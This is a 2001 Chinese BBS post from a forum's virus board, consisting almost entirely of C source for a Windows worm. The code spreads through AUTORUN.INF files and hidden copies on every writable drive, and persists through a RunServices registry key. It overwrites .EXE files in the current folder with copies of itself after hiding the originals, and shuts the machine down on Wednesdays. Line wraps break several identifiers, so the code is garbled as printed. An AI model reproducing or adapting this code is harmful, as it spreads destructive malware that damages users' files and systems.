荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: Mic (至酷霸王丸), 信区: Virus
标 题: 一个简单的worm病毒程序( Vc)
发信站: 荔园晨风BBS站 (Fri May 25 23:55:08 2001), 转信
发信人: xing (xing), 信区: Virus
标 题: 一个简单的worm病毒程序( Vc)
发信站: 启 明 星 站 (Fri May 25 13:20:28 2001), 转信
#include <stdio.h>
#include <windows.h>
static UINT MYFILELONG=53760;
static char fpath[260],fname[260],fext[4],is_run=1;
//从fullpath中得到路径和文件名、扩展名
long SpliteName(char *fullpath,char *path,char *fname,char *fext)
{
char temp[461],*p;
if(fullpath==NULL||*fullpath==0)return 1;
strncpy(temp,fullpath,460);
p=temp+strlen(temp)-1;
if(path!=NULL)*path=0;
if(fname!=NULL)*fname=0;
if(fext!=NULL)*fext=0;
while(p>temp)
{
if(*p=='.')
{
if(fext!=NULL)
{
strncpy(fext,p+1,3);
*(fext+3)=0;
}
*p=0;
}
else if(*p=='\\')
{
if(fname!=NULL)
strcpy(fname,p+1);
*(p+1)=0;
if(path!=NULL)
strcpy(path,temp);
return 0;
}
p--;
}
strcpy(fname,temp);
return 0;
}
//将路径、文件名、扩展名连接成为一个完整的路径
void MakePath(char *path,char *fname,char *fext,char *fullpath)
{
if(path!=NULL)
{
strcpy(fullpath,path);
if(fullpath[strlen(fullpath)-1]!='\\')
strcat(fullpath,"\\");
}
strcat(fullpath,fname);
if(fext!=NULL)
{
strcat(fullpath,".");
strcat(fullpath,fext);
}
}
//找到fpath\fname.fext文件,得到这个文件的大小
void GetMySize(void)
{
char ctemp[520];
wsprintf(ctemp,"%s%s.%s\0",fpath,fname,fext);
HANDLE hd;
WIN32_FIND_DATA wfd;
hd=FindFirstFile(ctemp,&wfd);
if(hd==INVALID_HANDLE_VALUE)return;
MYFILELONG=wfd.nFileSizeLow;
FindClose(hd);
}
//返回0则fname就是找到的可执行程序
unsigned long GetFile(char *fname,unsigned long init)
{
unsigned short i;
unsigned char dt[5];
FILE *fp;
static HANDLE hd;
WIN32_FIND_DATA wfd;
if(init==0)
{
hd=FindFirstFile("*.EXE",&wfd);
if(hd==INVALID_HANDLE_VALUE)return 1;
}
else if(!FindNextFile(hd,&wfd))return 1;
while(1)
{
if(wfd.nFileSizeLow!=MYFILELONG
&&(wfd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTOR)
==0)
{
fp=(FILE *)fopen(wfd.cFileName,"rb");
fseek(fp,(long)0x3c,SEEK_SET);
fread(dt,1,2,fp);
fseek(fp,(long)(dt[0]|(dt[1]<<8)),SEEK_SET);
memset(dt,0,2);
fread(dt,1,2,fp);
i=feof(fp);
fclose(fp);
//判断这个文件是不是可以执行的
if((dt[0]=='L'||dt[0]=='N'||dt[0]=='P')&&dt[1]=='E')
{
strcpy(fname,wfd.cFileName);
return 0;
}
}
if(!FindNextFile(hd,&wfd))break;
}
return 1;
}
UINT MakeRun(char drive,char *fpath,char *fname,char *fext)
{
char ctemp[460],ctemp1[260];
UINT i;
FILE *fp;
char str[]="C:\\AUTORUN.INF",d[4]="C:\\";
HANDLE hd;
WIN32_FIND_DATA wfd;
str[0]=drive;
d[0]=drive;
i=GetDriveType(d);
if(i==DRIVE_CDROM||i==0||i==1)return 1;//不可写的驱动器
hd=FindFirstFile(str,&wfd);
if(hd!=INVALID_HANDLE_VALUE)return 0;
FindClose(hd);
wsprintf(ctemp,"%s%s.%s",fpath,fname,fext);
wsprintf(ctemp1,"%c:\\SysBoot.EXE",drive);
if(CopyFile(ctemp,ctemp1,FALSE)==0)return 0;
SetFileAttributes(ctemp1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FIE
_A
TTRIBUTE_READONLY);
fp=fopen(str,"w+");
if(fp==NULL)return 0;
fprintf(fp,"[AUTORUN]\n");
fprintf(fp,"Open=\"%c:\\SysBoot.EXE\" /StartExplorer\n",drive);
fclose(fp);
SetFileAttributes(str,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_T
TR
IBUTE_READONLY);
return 0;
}
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
HKEY hKey,hKey1;
char lpstr[520],targepath[520],*p,Val[260],ctemp[4],*cm;
unsigned long i,type=REG_SZ,mxf=20;
char j;
DWORD cb;
SYSTEMTIME st;
cm=GetCommandLine();
p=cm+strlen(cm)-1;
while(*p!='\"')p--;
*p=0;
if(*cm=='\"')SpliteName(cm+1,fpath,fname,fext);
else SpliteName(cm,fpath,fname,fext);
GetMySize();
if(RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\ZMXLIB1",&hKey=
=ERROR_SU
CCESS)
RegCloseKey(hKey);
else
{
for(j=0;j<24;j++)
if(MakeRun('C'+j,fpath,fname,fext))break;
if(RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&K
ey)!=ERRO
R_SUCCESS)
{
RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion",h
Key1);
RegCreateKey(hKey1,"runServices",&hKey);
RegCloseKey(hKey1);
}
GetWindowsDirectory(targepath,260);
wsprintf(lpstr,"%s\\SysTra.EXE /SysTra:Kernel32.Dll",targepath);
cb=260;
i=RegQueryValueEx(hKey,"SystemTra\0",NULL,&type,(unsigned char )
Val,&cb);
if(i!=ERROR_SUCCESS||stricmp(Val,lpstr))
{
RegSetValueEx(hKey,"SystemTra\0",0,REG_SZ,(unsigned cha
*)lpstr,strlen(l
pstr));
RegCloseKey(hKey);
}
else
{
GetLocalTime(&st);
if(stricmp(szCmdLine,"/SysTra:Kernel32.Dll")==0)
{
if(st.wDayOfWeek==3)
ExitWindowsEx(EWX_SHUTDOWN,0);
GetWindowsDirectory(targepath,260);
SetCurrentDirectory(targepath);
mxf=50;
}
}
GetWindowsDirectory(targepath,260);
MakePath(fpath,fname,fext,lpstr);
strcat(targepath,"\\SYSTRA.EXE");
CopyFile(lpstr,targepath,FALSE);
if(GetDriveType(NULL)!=DRIVE_REMOVABLE)
{
for(i=0;i<mxf;i++)
if(GetFile(lpstr,i)==0)
{
SpliteName(lpstr,NULL,targepath,NULL);
strcat(targepath,".ZMX");
if(CopyFile(lpstr,targepath,TRUE))
SetFileAttributes(targepath,FILE_ATTRIBT
E_SYSTEM|FILE_ATTRIBUTE_HIDDE
N);
wsprintf(targepath,"%s%s.%s\0",fpath,fname,fext;
CopyFile(targepath,lpstr,FALSE);
}
}
}
lpstr[0]='\"';
if(i=stricmp(szCmdLine,"/StartExplorer"))
{
MakePath(fpath,fname,"ZMX",lpstr+1);
strcat(lpstr,"\" ");
strcat(lpstr,szCmdLine);
}
else {
GetWindowsDirectory(lpstr+1,460);
strcat(lpstr,"\\Explorer.exe\" ");
strncpy(ctemp,fpath,2);
ctemp[2]='\\';
ctemp[3]=0;
strcat(lpstr,ctemp);
}
WinExec(lpstr,iCmdShow);
return 0;
}
--
※ 来源:.启 明 星 站 bbs.tju.edu.cn.[FROM: 202.113.179.243]
┏━━━━━━━━━━━━━━┓
┃ 重 ┆ 考 ┆ 佛 ┆ 睡 ┆ 枯 ┃
┃ 修 ┆ 卷 ┆ 祖 ┆ 觉 ┆ 等 ┃
┃ 人 ┆ 发 ┆ 耶 ┆ 收 ┆ 乾 ┃
┃ 在 ┆ 下 ┆ 稣 ┆ 拾 ┆ 坐 ┃
┃ 深 ┆ ┆ 安 ┆ 回 ┆ 涂 ┃
┃ 大 ┆ ┆ 拉 ┆ 家 ┆ 鸦 ┃
┗━━━━━━━━━━━━━━┛
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店